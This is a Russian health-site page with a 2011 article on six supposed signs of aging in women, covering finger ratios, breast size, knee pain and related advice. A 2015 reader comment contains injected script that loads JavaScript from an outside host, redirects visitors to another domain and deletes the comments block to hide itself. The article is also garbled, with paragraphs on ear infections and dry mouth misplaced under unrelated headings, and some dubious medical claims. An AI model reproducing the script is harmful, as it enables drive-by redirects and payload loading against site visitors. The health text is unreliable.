Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Продлеваем молодость. 6 п...  >>  Продлеваем молодость. 6 признаков старения у женщин
 
Обратная связь
 

Продлеваем молодость. 6 признаков старения у женщин

Размер шрифта
03 марта 2011 00:01
  • google_analytics: false
  • Нравится

Пожалуй, нет человека, который с удовольствием ждал бы наступления старости. Одни об этом просто не задумываются, другие боятся этого периода жизни, а третьи стараются всеми силами противостоять возрастным изменениям, но… к сожалению, еще никому не удавалось выиграть сражение с возрастом. Однако нужно ли воспринимать старение как катастрофу?

Куда разумнее относиться к нему как к естественному процессу, обусловленному законами природы. И чтобы возраст не застал врасплох, не стал причиной страхов, стрессов и депрессий, лучше быть готовыми к тому, что будет происходить с вашим организмом после того, как вы преодолеете рубежи молодости и зрелости и вступите в осеннюю пору жизни.

По каким признакам можно определить те проблемы, которые возникнут у вас после 50 лет?

Пальцы рук

Те, у кого в детстве часто болели уши, как правило, с возрастом отмечают серьезные «неполадки» с вестибулярным аппаратом. Дело в том, что центр вестибулярного аппарата находится во внутреннем ухе. Регулярные воспалительные процессы не проходят бесследно: ткани внутреннего уха склерозируются, что приводит к нарушению органа, отвечающего за равновесие и координацию движений. В результате детская болезнь в преклонном возрасте «аукается» риском падений и серьезных травм.

Сравните длину пальцев рук: второго (указательного) и четвертого (безымянного). У мужчин второй палец короче четвертого или они одинаковой длины (это обусловлено наличием тестостерона в мужском организме). У женщин четвертый палец короче второго или они одинаковой длины (это обусловлено наличием эстрогенов в женском организме). Если у женщины второй палец короче четвертого (высокий уровень тестостерона), то во время менопаузы, когда количество эстрогенов снизится, у нее может развиться остеопороз и возникнуть проблемы с суставами.

Дело в том, что эстрогены контролируют встраивание кальция в костную ткань. При недостатке эстрогенов кости начинают довольно быстро терять кальций. По статистике, в течение первых пяти лет после наступления менопаузы некоторые женщины теряют до 25% костной массы, и примерно у 40% женщин старше 50 лет случаются переломы из-за прогрессирующей хрупкости костной ткани. Самое опасное – то, что зачастую этот процесс протекает незаметно, поэтому остеопороз и называют «тихой эпидемией».

Что делать?

1. Следить за состоянием своей костной системы. При первых признаках развития остеопороза пройти денситометрическое исследование костной ткани, чтобы выяснить, какова минеральная плотность ваших костей. Если остеопороз подтвердится, принимать препараты кальция и соблюдать специальную диету.

2. Избавиться от лишнего веса. Избыточные килограммы, которые вы носите на себе, - это тяжкий груз, с годами осложняющийся болезнями сердца, сосудов, повышенным давлением, расширением вен и другими неприятностями, которые не только ускоряют дряхление организма, но и ухудшают качество жизни.

С возрастом в нашем организме меняется гормональный фон, обмен веществ замедляется, потребность в энергетических поступлениях (калориях) снижается. Медики утверждают: если снизить калорийность дневного рациона на 30-40%, физиологическое старение наступит позже, а продолжительность жизни увеличится как минимум на треть.

Пропорции тела

Медицинская статистика свидетельствует: если у молодой женщины большая грудь (D и более), после 50 лет она попадает в группу риска развития сахарного диабета 2-го типа. Точная причина такой зависимости пока не выяснена, но ученые предполагают, что избыток жировой ткани понижает чувствительность клеток к инсулину.

Этот риск многократно увеличивается, если к большой груди прилагается еще и лишний вес. Если объем талии у женщины составляет больше 88 см, ей следует опасаться не только сахарного диабета, но и сердечно-сосудистых заболеваний.

Что делать?

1.Избавиться от лишнего веса. Избыточный вес более чем в три раза увеличивает опасность развития сахарного диабета 2-го типа. Ожирением страдают 90% диабетиков.

2. Следить за уровнем сахара в крови. Всемирная организация здравоохранения (ВОЗ) рекомендует после 40 лет делать контрольный анализ крови ежегодно, а тем, кто в группе риска (избыточный вес, родственники с диабетом и т.д.), - один раз в полгода.

3. Держать под контролем объем талии. Регулярно делайте упражнения, направленные на уменьшение жировых отложений в этой области. Это не только красиво, но и здорОво.

Боль под коленом

Сухость во рту периодически испытывает каждый. Но если это неприятное ощущение стало практически постоянным, - пора обратиться к врачу. Постоянная сухость во рту может быть симптомом сахарного диабета, а также предвестником болезни Паркинсона.

Боли под коленями может свидетельствовать о том, что у вас развивается варикозная болезнь вен нижних конечностей. Варикозная болезнь чревата еще более серьезным осложнением – тромбозом вен.

Дело в том, что под коленями проходят очень крупные вены. Когда вы подолгу сидите (особенно в неудобной позе или на слишком жестком сиденье), вены пережимаются, из-за чего кровоток нарушается, венозная кровь застаивается. Застой крови происходит и в том случае, если вы вынуждены подолгу стоять на ногах. Часто варикоз поражает людей с избыточным весом, а также женщин во время беременности. Если боли под коленями возникают все чаще, – значит, проблемы с венами пора решать.

Что делать?

1. Больше двигайтесь. Особенно если у вас «сидячая» работа. Занимайтесь плаванием, бегайте трусцой, катайтесь на велосипеде. Вместо лифта поднимайтесь по лестнице пешком.

2. Следите за своим весом. Развитию  варикоза способствует даже прибавка в 5 кг!

3. Пейте не менее 1,5 л жидкости в день. Кровь не должна быть слишком густой, чтобы легко двигаться  по венам.

4. Не носите тяжести. Даже если это ваш собственный (уже родившийся) ребенок.

5. Сделайте ультразвуковое обследование сосудов ног. Вовремя диагностированная варикозная болезнь лечится гораздо проще и менее болезненными методами.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

01 июля 2015 в 00:17

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Сколько лет вашему телу   Что приводит к потере слуха?   Не хотите потерять мужа, придется разрешить ходить налево!   40+: как теперь бороться со стрессом?  
18 августа 2011Отцом надо стать до 30 лет 26 июля 2011Старики за деревьями не видят леса
 
26 июля 2011Диеты помогают только молодым 23 июня 2011Возраст можно определить по слюне
 

Слайдшоу

1
Чего боятся женщины с годами
Как сохранить память. Часть 1
Быстроразвивающиеся виды рака. Часть 1

Тесты

Какой матрас вам подходит?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.